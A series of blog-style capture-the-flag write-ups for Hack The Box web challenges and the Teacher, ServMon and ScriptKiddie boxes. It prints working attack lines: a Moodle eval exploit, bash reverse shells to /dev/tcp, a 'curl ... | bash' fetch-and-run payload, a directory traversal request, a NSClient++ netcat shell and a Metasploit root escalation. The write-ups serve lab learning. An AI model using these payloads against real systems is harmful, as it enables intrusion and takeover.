Passman was the fourth web challenge from the Hack The Box Cyber Apocalypse Capture The Flag competition. Hello world, welcome to haxez where today I will be explaining how I hacked the Passman challenge during Cyber Apocalypse 2023. This challenge like all the other challenges had a description which went as follows.
Pandora discovered the presence of a mole within the ministry. To proceed with caution, she must obtain the master control password for the ministry, which is stored in a password manager. Can you hack into the password manager?
Enumerating The Passman Application
Upon browsing to the application I was presented with a login page. I attempted to use common credentials like ‘admin:admin’ and ‘admin:password’ but was unsuccessful. Fortunately, the application did offer a registration form.
After registering a new user for the application and logging in, I was greeted with a web-based password manager. Therefore, I started poking at the add password functionality. There were a number of forms for the user to fill out but upon clicking save, it would save the record to your account.
Deadends
Admittedly, I wasn’t familiar with the technology that needed to be exploited in order to solve the challenge. This took me down a lot of pathways for long periods of time without getting anywhere. I tried performing SQL injections, Server Side Template Injections, Cross Site Scripting, XML Entity Injection but couldn’t make any progress. It was then that I noticed Graphql in the sitemap in Burp. I have never used Graphql before so I needed to bring myself up to speed quite quickly.
GraphQL Playground
I played around with GraphQL queries for a bit thinking I could perform a query to get the admin password. I failed miserably but then I stumbled upon IppSec’s Cereal video which helped me to understand GraphQL in more detail. Also, GraphQL Playground allowed me to identify mutations that I didn’t know existed. I tried to construct the payload manually using GraphQL playground but I couldn’t get the structure right. I was past tired by this point and just wanted to solve the challenge.
Back To Burp
It dawned on me that the correct syntax for mutations was sitting in my Burp history. I grabbed the registered user POST request and sent it to the repeater. I then modified the mutation to update the admin username and password to ‘admin:admin’. Unfortunately, the first time I sent this request it came back with an error saying I wasn’t authenticated. However, I used my cookie from an authenticated session to send the request again and it worked.
Capturing The Passman Flag
I was then able to log in to the application as the admin user and capture the flag. The flag was just sitting there as a password entry waiting for me to steal it.
Gunhead was the second web hacking challenge of the Hack The Box Cyber Apocalypse Capture The Flag competition. Hello world, welcome to Haxez where I will be talking about the web hacking challenge Gunhead. Notably, this challenge is a great step up from the first challenge and like the other challenges here is the description.
During Pandora’s training, the Gunhead AI combat robot had been tampered with and was now malfunctioning, causing it to become uncontrollable. With the situation escalating rapidly, Pandora used her hacking skills to infiltrate the managing system of Gunhead and urgently needs to take it down.
Enumerating The Gunhead Application
The Gunhead application had a bit more functionality than the first application. It appeared to be an interface for a weapons control system. There were a number of interactable icons on the right side of the page. The first option showed us the status of the bot, the second told us its needs and the third appeared to be a command window.
Command Window
The command window had a help option. Obviously, running ‘/HELP’ in the terminal showed us that we had a number of commands that we could run. These commands included ‘/CLEAR’ to clear the current terminal, ‘/STORAGE’ to list the current storage space and ‘/PING’ which lets us ping a target.
Looking at the source it seems that ‘/STORAGE’ command is printing prewritten information. However, the ‘/PING’ command appears to be directly invoking systems commands. If we can find a way to tack on additional commands then perhaps we can enumerate the filesystem and find and cat the flag.
Command Injection
By running the ping command with an IP address and a semicolon, we can add our own commands on to the end such as the list command. For example, if we were to run ‘/PING 10.10.10.10; LS -LASH;’ then we would see the output of the list command. Unfortunately no ‘flag.txt’ file here.
If we continue enumerating the filesystem we can see that the flag file is in the ‘/’ directory. Consequently, all we should need to do now is cat the file.
Gunhead Capture The Flag
As shown below, we were able to capture the flag.txt file by appending the ‘cat’ command. Next, all we need to do now is copy the flag and submit and we’re done.
HTB{4lw4y5_54n1t1z3_u53r_1nput!!!}
Gunhead Review
The Gunhead web hacking challenge was a lot of fun and a good place to start learning about command injection. I remember that the Mr Robot lab had a similar vulnerability. Anyway, there isn’t much more to say about the challenge than that. It was well-designed and had fun visuals. I like challenges with strong themes as it helps to immerse you.
Trapped Source is the first Web challenge of the Hack The Box Cyber Apocalypse Capture The Flag competition. Hello world, welcome to Haxez where today I will write about my experience with the Trapped Source challenge. As with all the other challenges, the description for the Trapped Source challenge was as follows.
Intergalactic Ministry of Spies tested Pandora’s movement and intelligence abilities. She found herself locked in a room with no apparent means of escape. Her task was to unlock the door and make her way out. Can you help her in opening the door?
Now the question is, how do I write 300 words about a challenge that requires you to view page source? I have to write 300 words so that Yoast SEO doesn’t complain about not writing 300 words. Therefore, I’m going to write about how I have to write 300 words just to satisfy the SEO gods.
The Trapped Source Application
Once we spawn the docker container, we can head to the IP and port in our browser. I loved the presentation of the application, the pixelated font on the keypad and the colour design was great. Other than that, there wasn’t much to the application. As you can see from the image below, the challenge is to input the correct pin.
So how do we solve this challenge? how do we find the correct pin in order to get the flag? Perhaps we could brute force it. However, based on the name of the challenge I’m going to go out on a limb and say we should view the source. I’m sorry if this sounds patronising but I need to pad out this write-up.
The Source Of The Solution
Right-clicking the page to view the page source or inspecting it will show you the code being rendered by your browser. Unfortunately, it seems that our website developer included the secret pin in the javascript. There are lessons to be learned here about secure coding practices and client-side coding but that’s for a later date.
Trapped Source Flag Captured
After punching in the pin we get our flag. You can type it out but if you expand the source code a bit more, you will see the flag which you can copy and paste. I.m not even sure if you needed to put the pin in to solve it. It doesn’t make sense that you would need to. If its all client side then the flag should be client-side too, I just didn’t bother to check.
HTB{V13w_50urc3_c4n_b3_u53ful!!!}
Trapped Source Review
The Trapped Source challenge was fun and a well-designed challenge for the first web challenge. I’m glad that it wasn’t just a case of view source and win (although it might have been). It seems the creators of the challenge had fun making it. I had fun solving it and hopefully, you’re having fun reading about it. Anyway, that’s all for this challenge.
Hello world, welcome to Haxez. Today I’m looking at the Infiltration OSINT challenge on Hack The Box. The challenge asks the following:
“Can you find something to help you break into the company ‘Evil Corp LLC’. Recon social media sites to see if you can find any useful information.”
Ok, the first thing I did was head straight to google and search for Evil Corp LL in quotation marks. This ensures that we only get exact matches in our results. This technique is known as Google Dorking, although this is a pretty basic search operator.
Links To The Answer
The first result appears to be a Linkedin page which actually has a flag on it. We are Infiltration masters with our first Google search. Unfortunately, it seems that someone is playing games as this flag does not work when submitted. I wasn’t sure what to make of this but we will come back to it later.
I started looking through the employees and found Brian Delany whose job title at Evil Corp LLC is a hacker. Interestingly, his profile had a base64 encoded string. I decided to decode it using CyberChef which produced the following:
“There are people out there that will lie, steal and cheat to hide their own imperfections and to…
This gave me an idea, normally Hack The Box flags have a phrase but the fake flag on the Evil Corp LLC profile didn’t. if we take the string to CyberChef and ask it to bake it for us, we get some words of encouragement. Ok, this isn’t our flag. Time to move on.
I poked around on Linked in for a while longer but didn’t find much. I went back to Google and the second result was an Instagram page.
Infiltration of Instagram
I currently work as a penetration tester. One thing I’ve picked up is that before performing a Red Team engagement, it’s a good idea to look at the employee’s social media profiles. If you can spot a badge then you might be able to create a replica which could help get by security. The laptop and badge on this profile immediately caught my attention (Thanks Rich).
Unfortunately, you need to be registered to view the pictures properly. It’s 2023, who uses Instagram these days? It’s all about TikTok now, isn’t it? I’m kidding of course, I do have an Instagram account and visited her account on my phone. From there I was able to zoom in on the badge and find the flag.
Conclusion
These OSINT challenges are a lot of fun. I don’t see any active ones though so I think Hack The Box has moved away from them. It’s a shame honestly because it’s been a good break from smashing my face into box after box. So far, these challenges haven’t require too much effort other than poking around on the web. I will be doing more of them for sure.
Teacher is an easy Linux box created by mrh4sh on Hack The Box. The official walkthrough states that it’s a medium box. However, it is categorized as an easy box in the machines section. It is recommended that you have basic Linux and MySQL knowledge to complete this box. By completing this box you will learn Website Enumeration, Password Brute-Forcing, Moodle Quiz Module Exploitation, Database Enumeration, Password Cracking, and Linux Symlink Misconfiguration. Hello world, welcome to haxez where today I will be explaining how I hacked Teacher.
Teacher Enumeration
First, I spawned the box and connected my attack box to the Hack The Box VPN. Once connected, I sent a ping request to the box to ensure it was online. Then I performed a Nmap scan to check what ports were open. Furthermore, I requested the service versions, asked for default scripts to be run, and that the minimum packet rate was 10000. Finally, I saved the output in all formats to files called teacher. From the results, I learned that only port 80 for HTTP was open and that it was running Apache 2.4.25.
Since port 80 was the only open port, I headed over to the application. There wasn’t a great deal of functionality offered by the application. It seemed fairly generic with few pages that I could interact with. For an application that calls itself Blackhat Highschool, it seemed a bit too clean. I was hoping for something dark and edgy.
Moving on, I ran whatweb against the application which told me it was an HTML 5 application with JQuery 1.11.1. Next, I navigated to index pages with various different extensions (index.html, index.php). Sure enough, the one that loaded the main page was index.html.
As I didn’t have much to go on, I decided to run gobuster to look for hidden content. Perhaps there was a hidden directory or a secret file telling me that the princess is in another castle. I told gobuster to perform a directory attack using the raft-small-words.txt wordlist in SecLists. Furthermore, I also asked it to try various different extensions and set the thread count to 50.
Moodle
As a result, I learned that there was a directory called Moodle. Their GitHub page explains that Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License. Moodle is used for blended learning, distance education flipped classrooms, and other online learning projects in schools, universities, workplaces, and other sectors. I headed to the Moodle directory but received an error because it redirected to teacher.htb. Therefore, I added the IP address and teacher.htb domain to my /etc/hosts file and revisited the directory. Abracadabra, the site started loading.
Picture In Picture
I honestly don’t know what to say about this part of the box. I know I wouldn’t have found it if it wasn’t for a walkthrough. It’s not something I regularly check. I found Moodle but had no way to log in. However, directory listing on the images directory was enabled. Visiting each of the images loaded an image as expected, except for 5.png.
I downloaded the picture locally and used less to review the contents of the file. It wasn’t an image at all. It appeared to be a helpdesk ticket. I can’t fathom how a helpdesk ticket would have ended up on the website. For my own sanity, I’m going to pretend that the helpdesk agent and web developer are the same person. Furthermore, I’m also going to pretend that they accidentally renamed the wrong file and uploaded it. The ticket gave me the username Giovanni and a partial password of Th4C00lTeacha.
Moodle Bruteforce
I launched Burp and headed back to the Moodle login page. Next, I populated the login form with the credentials provided in the support ticket. Then, I clicked submit and located the login request in Burp’s HTTP history. I sent the request to the intruder tool and added a character to the end of the password. Then, I highlighted that character and added the payload characters.
Next, I navigated to the payload tab but because I’m using Burp community edition, I had to create my own payloads. As a result, I combined several wordlists from the SecLists fuzzing directory so that they contained numbers 0 to 9, all alphabetical characters (lower and uppercase), and all special characters.
I then click the start attack button and watched as Burp went through each payload, appending it to the end of the password. There are other tools that I could have used to do this such as WFUZZ or FFUF but I know how to use Burp so I thought it was the best option. An indication that a specific payload has had a different result is the length of the response produced by the application. The screenshot below shows that most of the responses were 868 characters. However, the payload with the # symbol produced a response with 993 characters.
Evil Teacher Vulnerability
I wasn’t sure what the Moodle version was. I ran what web again against the teacher.htb domain Moodle directory but got nothing. As a result, I looked on Google and found that the Moodle version can be found from the Moodle Docs for this page link at the bottom of a course page. This told me that it was Moodle version 3.4.
There is a vulnerability in Moodle 3.4 with the CVE designation CVE-2018–1133. The vulnerability is also known as Evil Teacher. It could allow a user with the teacher role to perform code execution by creating a quiz. SonarSource has an excellent writeup on it so I’m not going to attempt to explain it in too much detail. Essentially, formulas are passed to an eval function which allows for code execution. So if a threat actor can create a quiz with a malicious formula in one of the questions, they may be able to execute code.
Teacher Foothold
I navigated to the algebra page and enabled editing. Next, I used the add an activity or resource option to add a quiz to the Topic 1 section.
I gave the quiz a name and description and clicked next.
After that, I clicked the little blue add link on the next page and chose to add a question. Then, I selected the calculated question type as that would be likely to have the option to add a formula. Finally, I pasted the working exploit into the formula and changed the grad value to 100%.
/*{a*/`$_GET[0]`;//{x}}
It was time for the moment of truth. I captured the request with Burp and sent it to the repeater tool. Next, I appended the URL with a payload that would ping my box. I started tcpdump to listen out for ICMP packets that hit my tun0 adaptor and clicked send.
GET /moodle/question/question.php?returnurl=%2Fquestion%2Fedit.php%3Fcmid%3D7&appendqnumstring&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=/bin/ping+10.10.14.34 HTTP/1.1
sudo tcpdump -i tun0 -n icmp
To my surprise, it worked the first time. I started receiving ping packets from the target box.
Now that I had code execution, I modified my payload to a reverse shell, started netcat, and was able to pop a reverse shell.
GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D8%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=8&0=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.34/9001+0>%261' HTTP/1.1
Teacher System Enumeration
I couldn’t find the user flag once logged in so I checked the home directory and that there was a user called giovanna. That’s probably where the user.txt file is. I could try switching to that user with the password we logged in to Moodle with. However, I decided to take a look at the database first. I pulled the username and password from the /var/www/html/moodle/config.php file. After logging in, I was able to grab usernames and password hashes from the mdl_users table.
select id,username,password from mdl_user;
I copied the Giovannibak hash to a file on my attack box and used John to crack it with the rockyou wordlist.
I was then able to switch to the giovanni user and capture the user.txt flag.
www-data@teacher:/var/www/html/moodle$ su giovanni su giovanni Password: expelled giovanni@teacher:/var/www/html/moodle$ cd ~/ cd ~/ giovanni@teacher:~$ ls ls user.txt work giovanni@teacher:~$ cat user.txt cat user.txt 881▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓823
Teacher Privilege Escalation
The box keeps crashing meaning I have to do the above process all over again. As a result, the following explanation is going to be brief because I simply can’t be bothered with this box anymore. Looking at the time stamps on the user’s home directory I could see that something was changing fairly frequently. I set up a Python webserver and download pspy onto the box. Running pspy I noticed that a backup script was running.
The backup script was changing to the /home/giovanni/work directory and then backing up the courses directory. It was then changing the directory to /home/giovanni/work/tmp and changing the permissions to 777.
giovanni@teacher:/var/www/html/moodle/question$ cat /usr/bin/backup.sh #!/bin/bash cd /home/giovanni/work; tar -czvf tmp/backup_courses.tar.gz courses/*; cd tmp; tar -xf backup_courses.tar.gz; chmod 777 * -R;
You may have to forgive me here as I’ve reached the end of my tether. I had to restart the box about 5 times due to it crashing repeatedly. All I did was create a symbolic link from courses to /root. That way, when the script runs, the contents of the root directory will be backed up to work/tmp/courses which will allow me to capture the root flag.
giovanni@teacher:~/work$ ln -s /root courses giovanni@teacher:~/work$ ls -laSh courses giovanni@teacher:~/work$ ls courses courses.bak tmp giovanni@teacher:~/work$ cd tmp giovanni@teacher:~/work/tmp$ ls backup_courses.tar.gz courses giovanni@teacher:~/work/tmp$ cd courses giovanni@teacher:~/work/tmp/courses$ ls algebra root.txt giovanni@teacher:~/work/tmp/courses$ cat root.txt cat root.txt 63d▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓3cc
Teacher Learnings
Ironically, I didn’t learn a lot from the teacher box. The Moodle exploit was interesting as I hadn’t done it before but that was about it. Unfortunately, I have to say that this is one of my least favorite boxes that I’ve completed so far. The concept is nice but the box was too flakey, well for me it was anyway. It seemed that the slightest mistake in syntax caused the box to throw a tantrum. This is on a private VIP box too so not like other people were hitting it.
I think enabling SSH would have made the box more tolerable as it would have allowed quick access to the user. I wouldn’t want this on every box but having to repeat the Moodle exploit every time the box decided to stop responding made me want to quit. Also what was up with the credentials hidden in the image… Oh well, it’s done now and I can put it behind me. Glad I did it but didn’t enjoy it. Thanks for the box!
ServMon is an easy Windows box created by dmw0ng on Hack The Box. To own this box it is recommended that basic web enumeration, basic Windows enumeration, and SSH tunneling skills. By completing this box you will learn the following skills exploiting NVMS-1000, exploiting NSClient++, and SSH password spraying. Hello world, welcome to haxez where today I will explain how I hacked ServMon.
ServMon Service Enumeration
Once connected to the VPN, I spawned the box and sent it a ping request to check it was online. Then, I performed a Nmap scan against all ports and requested service versions. Furthermore, I told it to run default scripts gave it a minimum packet rate of 10000, and saved the output in all formats. As a result, I learned that there were several ports open including FTP which supports anonymous FTP, SSH, HTTP, SMB, and a bunch of RPC ports.
Starting with the lowest port, I used wget to download everything from the anonymous FTP server. As a result, I downloaded 2 files from the user’s directory. One belonging to Nadine named Confidential.txt and one belonging to Nathan called Notes to do.txt. The Confidential.txt file in Nadine’s directory was a note to Nathan that said the following:
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
The Notes to do.txt file found in Nathan’s directory was a todo list that said the following:
1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
I felt this was quite valuable information. First, I learned that there were two users, one called Nadine and one called Nathan. Next, I learned that there were a number of services including NSClient, NVMS, and Sharepoint. Furthermore, I know that the password for NVMS has recently been changed, and that NVMS is publically accessible.
Since SSH is never the intended attack vector, I moved to the next numerical port which was port 80 for HTTP. Upon navigating to the IP address in the Burp browser, A page loaded titled NVMS-1000. After performing a quick Google search, I learned that NVMS-1000 is a monitoring client specifically designed for network video surveillance. I had a quick skim through the documentation but unfortunately, there are no default credentials as the user defines them when performing the installation. I attempted some weak credentials such as admin:admin but was unsuccessful.
Next, I navigated to the NSClient page on port 8443. The official walkthrough shows this as having a login form but when I visited it, it didn’t. I couldn’t seem to interact with anything either and there did appear to be an error. Hopefully, this shouldn’t be a problem.
The notes from FTP specifically referenced this application so I presume that this is the intended foothold. After a bit more Googling, I found that NVMS-1000 is vulnerable to a directory traversal vulnerability. The vulnerability has the CVE designation of CVE-2019–20085 and could allow threat actors to retrieve files from the remote system. There is also a Python script on ExploitDB. Furthermore, I learned from the notes that Nadine had left a Passwords.txt file on Nathan’s Desktop. Seems like a match made in heaven. I grabbed a request from Burp’s HTTP history and sent it to the Repeater. I modified the request to include the required directory traversal and pointed it at the Passwords.txt file. Sure enough, I was able to retrieve the following passwords from the file.
Request
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1 Host: 10.129.227.75 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: dataPort=6063 Connection: close
Response
HTTP/1.1 200 OK Content-type: text/plain Content-Length: 156 Connection: close AuthInfo:
I now had a list of passwords and potential users. As a result, I created two wordlists, one for the passwords and one for the users containing the usernames root (I’m an optimist), administrator, Nathan, and Nadine. Next, I used crackmapexec to password spray the box with the usernames and passwords. After a few attempts, a login was successful with the Nadine user.
After logging in with SSH, I was pleasantly surprised to find that I could capture the user flag. Admittedly, I suspected that I would have to move laterally to Nathan first to capture it but nope. I moved to the desktop directory and was able to capture the flag. That makes sense since we stole the passwords.txt from Nathans’s desktop. Perhaps Nathan is no longer required.
nadine@SERVMON C:\Users\Nadine>cd Desktop nadine@SERVMON C:\Users\Nadine\Desktop>dir Volume in drive C has no label. Volume Serial Number is 2237-9369 Directory of C:\Users\Nadine\Desktop 02/27/2022 10:45 PM <DIR> . 02/27/2022 10:45 PM <DIR> .. 05/25/2023 11:03 PM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 5,814,657,024 bytes free nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt f18▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓848
ServMon System Enumeration
It’s time to pillage and plunder. After poking around the file system for a bit I noticed the C:\Program Files\NSClient++ directory. Within that directory is a nsclient.ini file which contains the configuration data for the service. The configuration data includes a password.
PS C:\Program Files\NSClient++> type nsclient.ini password = ew2x6SsGTxjRwXOT
Furthermore, it also specifies that the only allowed host is 127.0.0.1 which is the localhost. Perhaps this is why the page was acting janky when I visited it earlier. However, with some SSH tunneling magic, I should be able to trick it into thinking the requests are coming from the host. I used SSH to connect to the host but specified that I wanted to forward port 8443 from the box to 8443 on my attack box.
Unfortunately, it seems the jankyness wasn’t to do with my request not coming from 127.0.0.1. It seems that something is broken server side. The screenshot below shows the mess I was receiving whenever I refreshed the page. It seemed like the server was still loading but it was producing errors.
Not to be deterred, I respawned the box a few times, prematurely contacted support, and then tried a different browser. The login page finally loaded and I was able to log in with the password found in the .ini file.
ServMon Privilege Escalation Setup
I now had access to the portal but had no idea what to do. I read through the privilege escalation documentation offered by searchsploit. After that, I also read through the official walkthrough and watched IppSecs video to get a better understanding of what was going on. It was here that everything started going wrong and I wished I had never started this box. Everyone’s writeup says to put the payloads in C:\temp… Well, guess what… there is no C:\Temp. This box absolutely started getting the better of me to the point I had to walk away from it.
I went through a bunch of walkthroughs and found Yep’s walkthrough which made it seem simple by using the Python script on exploitdb. Sorry Yep but Nope! I got concatenation errors which I didn’t have a clue how to fix. I know I’m complaining a lot but I don’t understand how this is an easy box. This privilege escalation is incredibly frustrating.
What Not To Do
I navigated to settings, and external scripts and clicked add new. Next, I created a new script with the following parameters.
After that, I clicked save, and under the changes menu, I clicked save scripts. Next, I headed to the control menu and clicked reload.
Please note that you should also check that CheckExternalScripts and Scheduler are enabled in the modules section. These were on by default so I didn’t need to change anything but it is a prerequisite to getting the exploit to work.
Once all that was set up, I copied a Nishang reverse shell script to my current working directory and added my IP address.
So I’m going to stop here and say that all of this didn’t work. I took a long break and came back to it. The payloads kept getting caught by Defender and it kept getting frustrating.
ServMon Privilege Escalation
In the end, it was B1nsec’s article that got me through it, thanks dude!. So let’s uncomplicate things. First, I downloaded the 64-bit payload netcat payload onto my attack box. I then set up a Netcat listener on my attack box on port 443. Then, I span up a Python webserver to host the Netcat binary.
┌──(kali㉿kali)-[~/HTB/ServMon] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
On the target box, I created a directory called temp at the root of C. Not sure why I didn’t think to do this earlier. I think I was in tunnel vision mode. Then, I downloaded the 64-bit Netcat binary and saved it as nc.exe.
Once I confirmed it had downloaded correctly, I copied B1nsec’s command to create the payload that executes the NetCat binary with SYSTEM privileges.
PS C:\temp> curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.33 443 -e cmd.ex e" Enter host password for user 'admin': Added revshell as scripts\revshell.bat
Finally… I ran the command to execute the exploit.
PS C:\temp> curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m Enter host password for user 'admin': {"command":"revshell","lines":[{"message":"Command revshell didn't terminate within the timeout period 60s","perf":{}}],"result":3}
The reverse shell connected back to my attack machine and I was able to capture the root flag.
┌──(kali㉿kali)-[~/HTB/ServMon] └─$ sudo nc -lvnp 443 [sudo] password for kali: listening on [any] 443 ... whoami connect to [10.10.14.33] from (UNKNOWN) [10.129.179.11] 49695 Microsoft Windows [Version 10.0.17763.864] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami nt authority\system C:\Users\Administrator\Desktop>type root.txt type root.txt d50▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓04a
ServMon Learnings
I said some harsh things about this box during my writeup but in hindsight, the fault was with me. I’m not going to remove those comments because that’s how I felt at the time. This is a good box and once I understood the proper way to perform the privilege escalation, it was easy. The path to foothold was a lot of fun and was fairly simple. The directory traversal was practical and I like how the notes guided you to the file you needed.
The privilege escalation is simple if you do it correctly. Unfortunately, I went down every rabbit hole on the way to getting there. Everything I tried failed and it made me incredibly frustrated. I even started just looking for a flag online so that I could submit it and move on. However, in the end, persistence paid off. Granted I had to find the answer from another writeup but it taught me a lot along the way. I’m glad that this one is out of the way.
ScriptKiddie is an easy Linux box created by 0xdf on Hack The Box and was released on the 6th Feb 2021. Hello world, welcome to Haxez where today I will explain how I hacked ScriptKiddie. In order to complete this box it is recommended that you have basic Linux and Bash knowledge. It is also recommended that you know how to use Metasploit. By completing this box you will learn to exploit CVE-2020–7384. How to perform OS command Injection in command arguments, and how to run system commands from Metasploit console.
ScriptKiddie Service Enumeration
First, I connected to the Hack The Box VPN and spawned the box. As soon as I received the box’s IP address, I sent a ping to ensure it was online. After the box responded, I performed a Nmap scan to check all ports, request service versions and run default scripts. I set the minimum packet rate to 10000 packets and saved the output in all formats to files named scriptkiddie. As a result, I learnt that ports 22 for OpenSSH 8.2p1 and port 5000 for Werkzeug HTTP were open. Furthermore, the SSH banner revealed that it was an Ubuntu box.
As it’s never SSH, I went to view the application on port 5000. I launched Burp suite and opened the Burp browser through the proxy settings. The application loaded and I was amused by what I saw. Initially, I thought the name of the box was in reference to the skill level required. However, it seems that my target is a hacker or a script kiddie to be specific.
After poking at the application and testing for things like SSRF, I ran gobuster using the raft-small-words.txt wordlist from SecLists. Unfortunately, I didn’t find anything interesting but the practice is good for developing muscle memory and a methodology.
I ran ffuf against the Nmap scan feature. I tested the functionality in Burp to see what data was required. Then I constructed the command from those results. First I specified the target using the -u argument and supplying the URL. Next, I specified the data which was an IP address and the scan action which you can see below.
After that, I specified the special-chars.txt wordlist from SecLists. Finally, I used the -x argument to set Burp as a proxy. I ran the command but the responses weren’t correct. They didn’t contain the results of the Nmap scan. Looking at the request, I discovered that the Content-Type header wasn’t being supplied. I added this to the command and ran it again. The generic response size was 2145 so I added a filter for that and was able to identify a “bad character”.
Unfortunately, the & symbol was not a bad character. URL encoding the character and sending the request through Burp produced an invalid IP address error. It was only showing a different file size because it was a valid request. Back to testing.
Web Application Searchsploit Feature Fuzzing
I started poking at the sploits feature by searching for vulnerabilities. One interesting behaviour that I observed was searching for ms17–010 (Eternal Blue) produced a warning message. The warning message advised me that they would hack me for trying to hack them. I suspected that the hyphen character was triggering some input validation. Despite the warnings, I continued poking and learnt that the input was being passed to searchsploit. If Python was using exec or eval then I could get code execution.
First, I reloaded the previous ffuf command and removed the file size filter. Next, I change the value of the data value to include the search and action parameters. I wanted to fuzz the value of the search parameter so I added FUZZ to the end of it. I ran the scan and identified the default file size. Finally, I ran the scan again but filtered out the file default file zie. As a result, I learnt that & symbol, a full stop or period symbol, and the plus symbol were creating different responses. Unfortunately, looking at the responses from the server these different file sizes were expected responses. The rest of the fuzz requests produced errors but the and, plus and period symbols were all valid requests.
The final feature of the application allowed the user to generate payloads using msfvenom. It was time to use the Script Kiddies’ own application against them. By utilising my elite hacking skills I leveraged the application searchsploit functionality to discover a vulnerability in msfvenom. Ok, back to reality, certain versions of msfvenom are vulnerable to command injection through the APK template. The Script Kiddie was kind enough to give us a template upload feature.
On my attack box, I used searchsploit with the -m argument to copy the exploit to my current working directory. Next, I edited the exploit and changed the payload to a cURL command that downloads and executes my shell script. Admittedly, I’m not quite sure how the exploit works. I’m currently watching IppSec’s video and he’s going to explain it at the end.
# Change me payload = 'curl 10.10.14.54/shell.sh|bash'
Initially, I thought that I had to upload the Python script as the template. That does seem rather foolish now. The Python script generates the APK template which I then need to upload to the box. Next, I created my shell script.
With the web server and listener running, I ran the Python script to generate the APK. Honestly, I didn’t expect this to work the first time. I’ve completed around 70 easy boxes now and I always tend to struggle with “complex” payloads. Granted, it probably isn’t that complex compared to insane boxes but its all subjective I suppose.
Next, I populated the msfvenom settings on the target application. I selected Android for the target OS, 127.0.0.1 for the LHOST and selected the malicious APK for the template. After populating the parameters, I hit submit. The application thought about it for a while but then the first stage of the attack triggered. The server downloaded the shell.sh script from my webserver, and shortly after that, the reverse shell came back. This is by far one of the coolest attack chains I’ve ever successfully performed.
From here, I was able to capture the user flag.
┌──(kali㉿kali)-[~/HTB/ScriptKiddie/www] └─$ sudo nc -lvnp 1337 [sudo] password for kali: listening on [any] 1337 ... connect to [10.10.14.54] from (UNKNOWN) [10.129.95.150] 35960 bash: cannot set terminal process group (938): Inappropriate ioctl for device bash: no job control in this shell kid@scriptkiddie:~/html$ cat ~/user.txt cat ~/user.txt ca0▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ec0
ScriptKiddie Host Enumeration
Now that I had authenticated access to the box, it was time to perform some more enumeration. In order to capture the root flag, I will need to elevate my privileges. The only way to do that is through enumeration. However, first I upgraded my terminal using the Python trick.
Admittedly, the previous step was a bit pointless as I dropped an SSH key into the user’s authorized keys. I then connected to the box via SSH using the private key. Once on the box, I performed some manual enumeration and learnt there was another user called pwn. Furthermore, the pwn user had a readable script in their home directory named scanlosers.sh.
Reviewing the script, it is setting the log variable to /home/kid/logs/hackers. Next, it is changing the directory to the /home/pwn directory. After changing the directory, it uses cat to read the log file. Next, it uses space as a delimiter on the third field. It then passes the results to a while loop as an IP address and uses nmap to scan the IP.
ScriptKiddie Lateral Movement
Now that I understood what the script was doing, I should be able to craft a payload that gets executed. By echoing a payload to the /home/kid/logs/hackers file, the payload should get executed. However, I need to ensure that the payload is within the third field of the log. I started a netcat listener on port 1338 and then used echo to add the following payload to the log file.
kid@scriptkiddie:~$ echo 'a b $(bash -c "bash -i &>/dev/tcp/10.10.14.54/1338 0>&1")' > /home/kid/logs/hackers
The a and b part of the payloads takes up the first two fields. The reverse shell is then added to the third field which gets executed by the script. As a result, I received a reverse shell and now had access to the box as the pwn user.
ScriptKiddie Privilege Escalation
Now that I had access as the pwn user, I ran sudo -l to see if they could execute any commands with sudo privileges. As a result, I learnt that they could run Metasploit.
With that in mind, I launched Metasploit with sudo and then dropped into the ruby shell as root which allowed me to capture the root flag.
msf6 > irb stty: 'standard input': Inappropriate ioctl for device [*] Starting IRB shell... [*] You are in the "framework" object system("/bin/bash") Switch to inspect mode. irb: warn: can't alias jobs from irb_jobs. >> system("/bin/bash") id uid=0(root) gid=0(root) groups=0(root) whoami root cat /root/root.txt ab9▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓55c
ScriptKiddie Learnings
This is a box that I’m going to have to come back to at a later date. I understood the attack chain and why most things were vulnerable, but I couldn’t identify them. The initial foothold was a lot of fun. However, I definitely wouldn’t have suspected that particular feature to have the vulnerability. Given that there were only three features, I may have stumbled upon it eventually but I guess that’s where experience comes in.
Once on the box, I struggled to understand what to do next. Admittedly I should have checked for other users. I also learnt that my brain immediately goes into panic mode when trying to read code. I’m not a master at bash but I can read and write basic scripts. I don’t know why my immediate reaction was “This is too hard”. Then again, I wasn’t quite sure what I was looking for.
